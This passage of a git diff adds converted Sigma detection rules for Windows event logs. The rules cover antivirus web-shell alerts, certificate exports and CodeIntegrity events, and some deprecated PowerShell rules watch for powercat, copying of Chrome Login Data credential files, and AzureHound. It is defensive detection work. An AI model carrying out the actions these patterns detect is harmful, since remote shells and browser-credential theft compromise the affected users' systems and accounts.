there is a better backend handling + - :\Windows\ + - :\Temp\ + - :\PerfLogs\ + - :\Users\Public\ + - :\Users\Default\ + # true 'contains' matches: + - \Client\ + - \tsclient\ + - \inetpub\ + - /www/ + - apache + - tomcat + - nginx + - weblogic + selection_ext: + Path|endswith: + - .asax + - .ashx + - .asmx + - .asp + - .aspx + - .bat + - .cfm + - .cgi + - .chm + - .cmd + - .dat + - .ear + - .gif + - .hta + - .jpeg + - .jpg + - .jsp + - .jspx + - .lnk + - .php + - .pl + - .png + - .ps1 + - .psm1 + - .py + - .pyc + - .rb + - .scf + - .sct + - .sh + - .svg + - .txt + - .vbe + - .vbs + - .war + - .wsf + - .wsh + - .xml + condition: antivirus and (1 of selection_*) +fields: + - ThreatName + - User +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_webshell.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_webshell.yml new file mode 100644 index 000000000..94ea3ca22 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_webshell.yml @@ -0,0 +1,103 @@ +title: Antivirus Web Shell Detection +id: fdf135a2-9241-4f96-a114-bb404948f736 +status: test +description: Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches. +references: + - https://www.nextron-systems.com/?s=antivirus + - https://github.com/tennc/webshell + - https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection + - https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection + - https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection + - https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection + - https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection + - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection + - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection + - https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection +author: Florian Roth (Nextron Systems), Arnim Rupp +date: 2018/09/09 +modified: 2023/02/03 +tags: + - attack.persistence + - attack.t1505.003 +logsource: + category: antivirus + product: windows + service: windefend +detection: + antivirus: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' + - 1006 + - 1007 + - 1008 + - 1009 + - 1010 + - 1011 + - 1012 + - 1115 + - 1116 + - 1017 + - 1018 + - 1019 + - 1115 + - 1116 + Channel: Microsoft-Windows-Windows Defender/Operational + selection: + - ThreatName|startswith: + - PHP. + - JSP. + - ASP. + - Perl. + - VBS/Uxor # looking for 'VBS/' would also find downloaders and droppers meant for desktops + - IIS/BackDoor + - JAVA/Backdoor + - Troj/ASP + - Troj/PHP + - Troj/JSP + - ThreatName|contains: + - Webshell + - Chopper + - SinoChoper + - ASPXSpy + - Aspdoor + - filebrowser + - PHP_ + - JSP_ + - ASP_ # looking for 'VBS_' would also find downloaders and droppers meant for desktops + - 'PHP:' + - 'JSP:' + - 'ASP:' + - 'Perl:' + - PHP/ + - JSP/ + - ASP/ + - Perl/ + - PHPShell + - Trojan.PHP + - Trojan.ASP + - Trojan.JSP + - Trojan.VBS + - PHP/Agent + - ASP/Agent + - JSP/Agent + - VBS/Agent + - Backdoor/PHP + - Backdoor/JSP + - Backdoor/ASP + - Backdoor/VBS + - Backdoor/Java + - PHP.Agent + - ASP.Agent + - JSP.Agent + - VBS.Agent + - Backdoor.PHP + - Backdoor.JSP + - Backdoor.ASP + - Backdoor.VBS + - Backdoor.Java + - PShlSpy + - C99shell + condition: antivirus and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml b/tools/sigmac/converted_rules/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml new file mode 100644 index 000000000..037d75920 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml @@ -0,0 +1,24 @@ +title: Certificate Exported From Local Certificate Store +id: 58c0bff0-40a0-46e8-b5e8-b734b84d2017 +status: experimental +description: Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store. +references: + - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html +author: Zach Mathis +date: 2023/05/13 +tags: + - attack.credential_access + - attack.t1649 +logsource: + product: windows + service: certificateservicesclient-lifecycle-system +detection: + certificateservicesclient_lifecycle_system: + Channel: Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational + selection: + EventID: 1007 # A certificate has been exported + condition: certificateservicesclient_lifecycle_system and selection +falsepositives: + - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml new file mode 100644 index 000000000..1f6c76eb0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml @@ -0,0 +1,106 @@ +title: CodeIntegrity - Unmet Signing Level Requirements By File Under Validation +id: f8931561-97f5-4c46-907f-0a4a592e47a7 +status: experimental +description: | + Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. + This event is best correlated with EID 3089 to determine the error of the validation. +references: + - https://twitter.com/SBousseaden/status/1483810148602814466 + - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +date: 2022/01/20 +modified: 2023/11/15 +tags: + - attack.execution +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: + - 3033 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements. + - 3034 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy. However, due to code integrity auditing policy, the image was allowed to load. + filter_optional_dtrace: + # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\DTrace\dtrace.dll that did not meet the Windows signing level requirements. + FileNameBuffer|endswith: \Program Files\DTrace\dtrace.dll + ProcessNameBuffer|endswith: \Windows\System32\svchost.exe + RequestedPolicy: 12 + filter_optional_av_generic: + # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\ProgramData\Microsoft\Windows Defender\Platform\4.18.2207.7-0\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_36fb67bd6dbd887d\igd10iumd64.dll that did not meet the Custom 3 / Antimalware signing level requirements. + FileNameBuffer|contains: \Windows\System32\DriverStore\FileRepository\ + FileNameBuffer|endswith: \igd10iumd64.dll + # ProcessNameBuffer is AV products + RequestedPolicy: 7 + filter_optional_electron_based_app: + # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\Users\user\AppData\Local\Keybase\Gui\Keybase.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvspcap64.dll that did not meet the Microsoft signing level requirements. + FileNameBuffer|endswith: \Windows\System32\nvspcap64.dll + ProcessNameBuffer|endswith: + - \AppData\Local\Keybase\Gui\Keybase.exe + - \Microsoft\Teams\stage\Teams.exe + RequestedPolicy: 8 + filter_optional_bonjour: + FileNameBuffer|endswith: \Program Files\Bonjour\mdnsNSP.dll + ProcessNameBuffer|endswith: + - \Windows\System32\svchost.exe + - \Windows\System32\SIHClient.exe + RequestedPolicy: + - 8 + - 12 + filter_optional_msoffice: + FileNameBuffer|contains: \Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE + FileNameBuffer|endswith: \MSOXMLMF.DLL + # ProcessNameBuffer is AV products + RequestedPolicy: 7 + filter_optional_slack: + # Example: https://user-images.githubusercontent.com/112784902/197407680-96d4b662-8a59-4289-a483-b24d630ac2a9.png + # Even though it's the same DLL as the one used in the electron based app filter. We need to do a separate selection due to slack's folder naming convention with the version number :) + FileNameBuffer|endswith: \Windows\System32\nvspcap64.dll + ProcessNameBuffer|contains: \AppData\Local\slack\app- + ProcessNameBuffer|endswith: \slack.exe + RequestedPolicy: 8 + filter_optional_firefox: + # Example: https://user-images.githubusercontent.com/62423083/197451483-70e89010-ed96-4357-8079-b5a061a239d6.png + FileNameBuffer|endswith: + - \Mozilla Firefox\mozavcodec.dll + - \Mozilla Firefox\mozavutil.dll + ProcessNameBuffer|endswith: \Mozilla Firefox\firefox.exe + RequestedPolicy: 8 + filter_optional_avast: + FileNameBuffer|endswith: + - \Program Files\Avast Software\Avast\aswAMSI.dll + - \Program Files (x86)\Avast Software\Avast\aswAMSI.dll + RequestedPolicy: + - 8 + - 12 + filter_main_gac: + # Filtering the path containing this string because of multiple possible DLLs in that location + FileNameBuffer|contains: \Windows\assembly\GAC\ + ProcessNameBuffer|endswith: \mscorsvw.exe + ProcessNameBuffer|contains: \Windows\Microsoft.NET\ + RequestedPolicy: 8 + filter_optional_google_drive: + # Example: \Program Files\Google\Drive File Stream\67.0.2.0\crashpad_handler.exe + FileNameBuffer|contains: \Program Files\Google\Drive File Stream\ + FileNameBuffer|endswith: \crashpad_handler.exe + ProcessNameBuffer|endswith: \Windows\ImmersiveControlPanel\SystemSettings.exe + RequestedPolicy: 8 + filter_optional_trend_micro: + FileNameBuffer|endswith: \Trend Micro\Client Server Security Agent\perficrcperfmonmgr.dll + RequestedPolicy: 8 + filter_optional_mdns_responder: + FileNameBuffer|endswith: '\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll ' + filter_optional_mcafee: + FileNameBuffer|endswith: + - \Program Files\McAfee\Endpoint Security\Threat Prevention\MfeAmsiProvider.dll + - \Program Files\McAfee\MfeAV\AMSIExt.dll + filter_optional_eset: + FileNameBuffer|endswith: \Program Files\ESET\ESET Security\eamsi.dll + condition: codeintegrity_operational and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) +falsepositives: + - Antivirus and other third party products are known to trigger this rule quite a lot. Initial filters and tuning is required before using this rule. +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml new file mode 100644 index 000000000..2344d95f3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml @@ -0,0 +1,25 @@ +title: CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked +id: 5daf11c3-022b-4969-adb9-365e6c078c7c +status: experimental +description: Detects block events for files that are disallowed by code integrity for protected processes +references: + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/06 +tags: + - attack.privilege_escalation +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: 3104 # Windows blocked file %2 which has been disallowed for protected processes. + condition: codeintegrity_operational and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml new file mode 100644 index 000000000..6ba9a0877 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml @@ -0,0 +1,27 @@ +title: CodeIntegrity - Blocked Image/Driver Load For Policy Violation +id: e4be5675-4a53-426a-8c81-a8bb2387e947 +status: experimental +description: Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy. +references: + - https://twitter.com/wdormann/status/1590434950335320065 + - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/11/10 +modified: 2023/06/07 +tags: + - attack.privilege_escalation + - attack.t1543 +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: 3077 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy (Policy ID:%XX). + condition: codeintegrity_operational and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml new file mode 100644 index 000000000..cf72d4d5a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml @@ -0,0 +1,26 @@ +title: CodeIntegrity - Blocked Driver Load With Revoked Certificate +id: 9b72b82d-f1c5-4632-b589-187159bc6ec1 +status: experimental +description: Detects blocked load attempts of revoked drivers +references: + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/06 +tags: + - attack.privilege_escalation + - attack.t1543 +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: 3023 # The driver %2 is blocked from loading as the driver has been revoked by Microsoft. + condition: codeintegrity_operational and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml new file mode 100644 index 000000000..afaff2738 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml @@ -0,0 +1,27 @@ +title: CodeIntegrity - Revoked Kernel Driver Loaded +id: 320fccbf-5e32-4101-82b8-2679c5f007c6 +status: experimental +description: Detects the load of a revoked kernel driver +references: + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/06 +tags: + - attack.privilege_escalation +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: + - 3021 # Code Integrity determined a revoked kernel module %2 is loaded into the system. Check with the publisher to see if a new signed version of the kernel module is available. + - 3022 # Code Integrity determined a revoked kernel module %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached. + condition: codeintegrity_operational and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml new file mode 100644 index 000000000..f150675f7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml @@ -0,0 +1,25 @@ +title: CodeIntegrity - Blocked Image Load With Revoked Certificate +id: 6f156c48-3894-4952-baf0-16193e9067d2 +status: experimental +description: Detects blocked image load events with revoked certificates by code integrity. +references: + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/06 +tags: + - attack.privilege_escalation +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: 3036 # Windows is unable to verify the integrity of the file %2 because the signing certificate has been revoked. Check with the publisher to see if a new signed version of the kernel module is available. + condition: codeintegrity_operational and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml new file mode 100644 index 000000000..232801454 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml @@ -0,0 +1,27 @@ +title: CodeIntegrity - Revoked Image Loaded +id: 881b7725-47cc-4055-8000-425823344c59 +status: experimental +description: Detects image load events with revoked certificates by code integrity. +references: + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/06 +tags: + - attack.privilege_escalation +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: + - 3032 # Code Integrity determined a revoked image %2 is loaded into the system. Check with the publisher to see if a new signed version of the image is available. + - 3035 # Code Integrity determined a revoked image %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached. + condition: codeintegrity_operational and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml new file mode 100644 index 000000000..f7e1bed39 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml @@ -0,0 +1,25 @@ +title: CodeIntegrity - Unsigned Kernel Module Loaded +id: 951f8d29-f2f6-48a7-859f-0673ff105e6f +status: experimental +description: Detects the presence of a loaded unsigned kernel module on the system. +references: + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/06 +tags: + - attack.privilege_escalation +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: 3001 # Code Integrity determined an unsigned kernel module %2 is loaded into the system. Check with the publisher to see if a signed version of the kernel module is available + condition: codeintegrity_operational and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml new file mode 100644 index 000000000..a34397684 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml @@ -0,0 +1,25 @@ +title: CodeIntegrity - Unsigned Image Loaded +id: c92c24e7-f595-493f-9c98-53d5142f5c18 +status: experimental +description: Detects loaded unsigned image on the system +references: + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/06 +tags: + - attack.privilege_escalation +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: 3037 # Code Integrity determined an unsigned image %2 is loaded into the system. Check with the publisher to see if a signed version of the image is available. + condition: codeintegrity_operational and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_whql_failure.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_whql_failure.yml new file mode 100644 index 000000000..0d61abd52 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_whql_failure.yml @@ -0,0 +1,32 @@ +title: CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module +id: 2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f +status: experimental +description: Detects loaded kernel modules that did not meet the WHQL signing requirements. +references: + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/06 +modified: 2023/06/14 +tags: + - attack.privilege_escalation +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: + - 3082 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. However, due to code integrity auditing policy, the image was allowed to load + - 3083 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. Check with the publisher to see if a WHQL compliant kernel module is available + filter_optional_vmware: + FileNameBuffer: + - system32\drivers\vsock.sys + - System32\drivers\vmci.sys + condition: codeintegrity_operational and (selection and not 1 of filter_optional_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_pm_powercat.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_pm_powercat.yml new file mode 100644 index 000000000..f0b3c0fa1 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_pm_powercat.yml @@ -0,0 +1,33 @@ +title: Netcat The Powershell Version - PowerShell Module +id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 +status: deprecated +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network +references: + - https://nmap.org/ncat/ + - https://github.com/besimorhino/powercat + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md +author: frack113 +date: 2021/07/21 +modified: 2023/01/20 +tags: + - attack.command_and_control + - attack.t1095 +logsource: + product: windows + category: ps_module + definition: 'Requirements: PowerShell Module Logging must be enabled' +detection: + ps_module: + EventID: 4103 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ContextInfo|contains: + - 'powercat ' + - powercat.ps1 + condition: ps_module and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml new file mode 100644 index 000000000..32d087621 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml @@ -0,0 +1,38 @@ +title: Accessing Encrypted Credentials from Google Chrome Login Database +id: 98f4c75c-3089-44f3-b733-b327b9cd9c9d +status: deprecated +author: frack113 +date: 2021/12/20 +modified: 2022/05/14 +description: | + Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. + Web browsers typically store the credentials in an encrypted format within a credential store. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection_cmd: + ScriptBlockText|contains|all: + - Copy-Item + - -Destination + selection_path: + ScriptBlockText|contains: + - \Google\Chrome\User Data\Default\Login Data + - \Google\Chrome\User Data\Default\Login Data For Account + condition: ps_script and (all of selection_*) +falsepositives: + - Unknown +level: medium +tags: + - attack.credential_access + - attack.t1555.003 +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_azurehound_commands.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_azurehound_commands.yml new file mode 100644 index 000000000..11c36e4fd --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_azurehound_commands.yml @@ -0,0 +1,36 @@ +title: AzureHound PowerShell Commands +id: 83083ac6-1816-4e76-97d7-59af9a9ae46e +status: deprecated +description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound +references: + - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 + - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html +author: Austin Songer (@austinsonger) +date: 2021/10/23 +modified: 2023/01/02 +tags: + - attack.discovery + - attack.t1482 + - attack.t1087 + - attack.t1087.001 + - attack.t1087.002 + - attack.t1069.001 + - attack.t1069.002 + - attack.t1069 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enabled +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains: Invoke-AzureHound + condition: ps_script and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_invocation_lolscript.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_invocation_lolscript.yml new file mode 100644 index 000000000..ee47d037b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_invocation_lolscript.yml @@ -0,0 +1,32 @@ +title: Execution via CL_Invocation.ps1 - Powershell +id: 4cd29327-685a-460e-9dac-c3ab96e549dc +status: deprecated +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +references: + - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/ + - https://twitter.com/bohops/status/948061991012327424 +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2023/08/17 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + category: ps_script + definition: 'Requirements: Script Block Logging must be enabled' +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains|all: + - CL_Invocation.ps1 + - SyncInvoke + condition: ps_script and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml new file mode 100644 index 000000000..fe3a486ae --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml @@ -0,0 +1,32 @@ +title: Execution via CL_Mutexverifiers.ps1 +id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 +status: deprecated +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +references: + - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ + - https://twitter.com/pabraeken/status/995111125447577600 +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2023/08/17 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + category: ps_script + definition: 'Requirements: Script Block Logging must be enabled' +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains|all: + - CL_Mutexverifiers.ps1 + - runAfterCancelProcess + condition: ps_script and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_file_and_directory_discovery.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_file_and_directory_discovery.yml new file mode 100644 index 000000000..e76013dc6 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_file_and_directory_discovery.yml @@ -0,0 +1,37 @@ +title: Powershell File and Directory Discovery +id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 +status: deprecated +description: | + Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. + Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, + including whether or not the adversary fully infects the target and/or attempts specific actions. +references: + - 